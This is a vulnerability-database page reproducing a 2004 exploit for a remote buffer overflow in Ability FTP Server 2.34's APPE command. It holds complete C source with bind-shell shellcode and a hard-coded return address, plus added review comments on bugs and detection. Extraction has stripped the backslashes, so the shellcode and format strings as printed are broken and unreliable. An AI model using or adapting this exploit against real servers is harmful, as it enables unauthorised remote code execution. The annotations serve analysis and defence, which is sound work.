Ability Server 2.34 – ‘APPE’ Remote Buffer Overflow

Ability Server 2.34 – ‘APPE’ Remote Buffer Overflow

漏洞ID 1054826 漏洞类型
发布时间 2004-12-16 更新时间 2004-12-16
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/693
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

TESTED ON WINXP SP0 RUS

(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru

HAPPY NEW YEAR!

Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...

*/

#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>

// shellc0de by m00 team  bind 61200
// Payload literal, reproduced here byte-for-byte as the page shows it. Two review notes:
//  - Every escape appears to have lost its backslash during extraction ("x90" where
//    the source almost certainly read "\x90"); the printf strings further down show
//    the same stripping ("...n" for "\n"). As printed this is ASCII text, not machine
//    code, and sizeof(shellcode) is roughly 40 lines x 45 chars + 1 (~1801) rather
//    than the ~601 bytes the buffer layout in login() assumes.
//  - Per the author's comment above this is a bind shell on TCP 61200; from a
//    defender's point of view a new listener on that port appearing right after an
//    FTP session to this server is the indicator to alert on.
char shellcode[]=
"x90x90x90x90x90xEBx0Fx58x80x30xBBx40x81x38x6D"
"x30x30x21x75xF4xEBx05xE8xECxFFxFFxFFx52xD7xBA"
"xBBxBBxE6xEEx8Ax60xDFx30xB8xFBx28x30xF8x44xFB"
"xCEx42x30xE8xB8xDDx8Ax69xDDx03xBBxABxDDx3Ax81"
"xF6xE1xCFxBCx92x79x52x49x44x44x44x32x68x30xC1"
"x87xBAx6CxB8xE4xC3x30xF0xA3x30xC8x9Bx30xC0x9F"
"xBAx6DxBAx6Cx47x16xBAx6Bx2Dx3Cx46xEAx8Ax72x3B"
"x7AxB4x48x1DxC9xB1x2DxE2x3Cx46xCFxA9xFCxFCx59"
"x5Dx05xB4xBBxBBxBBx92x75x92x4Cx52x53x44x44x44"
"x8Ax7BxDDx30xBCx7Ax5BxB9x30xC8xA7xBAx6DxBAx7D"
"x16xBAx6Bx32x7Dx32x6CxE6xECx36x26xB4xBBxBBxBB"
"xE8xECx44x6Dx36x26xE8xBBxBBxBBxE8x44x6Bx32x7C"
"x36x3ExE1xBBxBBxBBxEBxECx44x6Dx36x36x2CxBBxBB"
"xBBxEAxD3xB9xBBxBBxBBx44x6Bx36x26xDExBBxBBxBB"
"xE8xECx44x6Dx8Ax72xEAxEAxEAxEAxD3xBAxBBxBBxBB"
"xD3xB9xBBxBBxBBx44x6Bx32x78x36x3ExCBxBBxBBxBB"
"xEBxECx44x6DxD3xABxBBxBBxBBx36x36x38xBBxBBxBB"
"xEAxE8x44x6Bx36x3ExCExBBxBBxBBxEBxECx44x6DxD3"
"xBAxBBxBBxBBxE8x44x6Bx36x3ExC7xBBxBBxBBxEBxEC"
"x44x6Dx8Ax72xEAxEAxE8x44x6BxE4xEBx36x26xFCxBB"
"xBBxBBxE8xECx44x6DxD3x44xBBxBBxBBxD3xFBxBBxBB"
"xBBx44x6Bx32x78x36x36x93xBBxBBxBBxEAxECx44x6D"
"xE8x44x6BxE3x32xF8xFBx32xF8x87x32xF8x83x7CxF8"
"x97xBAxBAxBBxBBx36x3Ex83xBBxBBxBBxEBxECx44x6D"
"xE8xE8x8Ax72xEAxEAxEAxD3xBAxBBxBBxBBxEAxEAx36"
"x26x04xBBxBBxBBxE8xEAx44x6Bx36x3ExA7xBBxBBxBB"
"xEBxECx44x6Dx44x6Bx53x34x45x44x44xFCxDExCFxEB"
"xC9xD4xD8xFAxDFxDFxC9xDExC8xC8xBBxF7xD4xDAxDF"
"xF7xD2xD9xC9xDAxC9xC2xFAxBBxFExC3xD2xCFxEBxC9"
"xD4xD8xDExC8xC8xBBxFCxDExCFxE8xCFxDAxC9xCFxCE"
"xCBxF2xD5xDDxD4xFAxBBxF8xC9xDExDAxCFxDExEBxC9"
"xD4xD8xDExC8xC8xFAxBBxFCxD7xD4xD9xDAxD7xFAxD7"
"xD7xD4xD8xBBxCCxC8x89xE4x88x89xBBxECxE8xFAxE8"
"xCFxDAxC9xCFxCExCBxBBxECxE8xFAxE8xD4xD8xD0xDE"
"xCFxFAxBBxD9xD2xD5xDFxBBxD7xD2xC8xCFxDExD5xBB"
"xDAxD8xD8xDExCBxCFxBBxB9xBBx54xABxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBAxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBBxBB"
"xBBxBBxBBxBBxBBxBBxBBxD8xD6xDFxBBx6Dx30x30x21";


// Resolve `host`, open a TCP connection to `port` and return the socket descriptor.
// Every failure path calls exit(0) — note the zero status even on error, and that
// exit() is used although no <stdlib.h> is included above (windows.h may pull it in,
// but that is not visible here).
int conn(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    WSADATA wsa;
    struct sockaddr_in sa;

    WSAStartup(MAKEWORD(2,0), &wsa);   // return value not checked; no matching WSACleanup() anywhere in the file
    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf("gethostbyname() error!n"); exit(0);   // "n" was presumably "\n" before extraction (same for every printf below)
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);   // first resolved address only; h_addr_list[0] is not checked for NULL

    sock = socket(AF_INET, SOCK_STREAM, 0);
    // NOTE(review): Winsock's socket() returns SOCKET and reports failure as
    // INVALID_SOCKET; this `< 0` test only works because that value narrows to -1
    // when stored in an int. Comparing against INVALID_SOCKET is the documented check.
    if (sock < 0)      {
        printf("socketn");
        exit(0);
        }
    // connect() reports SOCKET_ERROR (-1) on failure, so `< 0` is fine here.
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
        {printf("connect() error!n");
        exit(0);
          }
    printf("connected to %sn", host);
    return sock;
}


// Authenticate on the already-connected FTP socket (USER/PASS), then send the
// oversized APPE command. The same command line is also written to "bochka.txt"
// in the current directory; that FILE is never fclose()d (a leak) and the fopen()
// result is never checked, so fprintf() may be handed a NULL stream.
void login(int sock, char *login, char *pass)
{

FILE *file;
char ubuf[1000], pbuf[1000], rc[200];
int i;                                    // unused
char bochka[2000], med[2000];

file = fopen("bochka.txt", "w+");         // return value not checked

      // Payload layout: 1000 bytes of 0x43 ('C'), with the 4 bytes at offsets
      // 969..972 replaced by a fixed address, followed by the shellcode array.
      memset(bochka, 0x00, 2000);
      memset(bochka, 0x43, 1000);
      // Hard-coded address, presumably tied to the exact ntdll.dll build the
      // author tested on (WinXP SP0 RUS per the header). Any other build, or
      // ASLR on later Windows versions, breaks this — which is why the effective
      // mitigation is upgrading the server / the OS rather than a per-host tweak.
      *(long*)&bochka[969] = 0x77F5801C; // ntdll.dll JMP ESP ADDR...
      // strlen(bochka) is 1000 here: the address contains no zero byte and
      // bochka[1000] is 0. sizeof(shellcode) includes the literal's terminating
      // NUL. As printed on this page (escapes stripped, ~1801 bytes) this copy
      // overruns the 2000-byte bochka; it only fits with the original "\x"-encoded
      // literal (~601 bytes).
      memcpy(bochka+strlen(bochka), &shellcode, sizeof(shellcode));

      sprintf(med, "APPE %srn", bochka);  // unbounded sprintf into med[2000]; see the size note above
      fprintf(file, "%s", med);

      if ( strlen(pass) >= 100 )  { printf("2 long password!n"); exit(0); }
      if ( strlen(login) >= 100 ) { printf("2 long login!n"); exit(0);    }

      sprintf(ubuf, "USER %srn", login);  // bounded by the length checks just above
      send(sock, ubuf, strlen(ubuf), 0);  // send()/recv() return values are ignored throughout
      printf("USER sending...n");
      Sleep(1000);
      printf("OK!n");

      sprintf(pbuf, "PASS %srn", pass);
      send(sock, pbuf, strlen(pbuf), 0);
      printf("PASS sending...n");
      Sleep(1000);
      // rc is never zeroed and recv()'s byte count is discarded, so the strstr()
      // below may read past the received bytes — rc[200] has no guaranteed terminator.
      recv(sock, rc, 200, 0);
      if ( strstr(rc, "530")) {printf("Bad password!n"); exit(0); }
      printf("OK!n");
      Sleep(1000);
      printf("Sending 604KY C MEDOM!n");
      // Detection: an FTP APPE argument well over 1 KB is the signature here; a
      // server or IDS that enforces a sane command-line length limit stops it,
      // and the original KaGra advisory referenced at the end of the file names
      // the affected versions (<= 2.34).
      send(sock, med, strlen(med), 0);
      Sleep(1000);
      printf("TrY To CoNnEcT tO...nn");

}

// Entry point: un-aftp.exe <host> <username> <password>. Connects to the FTP
// port (21, hard-coded), runs login(), closes the socket and sleeps 2 s before
// returning. Usage errors exit(0) like every other failure path in this file.
int main(int argc, char **argv)
{
    int sock = 0;
    int data;                          // unused
    printf("nAbility FTP Server <= 2.34 R00T exploitn");   // "n" was presumably "\n" before extraction
    printf("by Dark Eagle [ unl0ck team ]nhttp://unl0ck.void.runn");

    if ( argc < 4 ) { printf("usage: un-aftp.exe <host> <username> <password>nn"); exit(0); }

    sock = conn(argv[1], 21);          // port 21 is hard-coded; conn() exits on any failure
    login(sock, argv[2], argv[3]);
    closesocket(sock);                 // no WSACleanup() to pair with the WSAStartup() done in conn()
    Sleep(2000);

    return 0;
}

//Reference:
//2004-10-23
//Ability Server 2.34 and below Remote APPE Buffer Overflow Exploit 	
//KaGra
//http://www.milw0rm.com/id.php?id=592 (https://www.exploit-db.com/exploits/592/)

// milw0rm.com [2004-12-16]
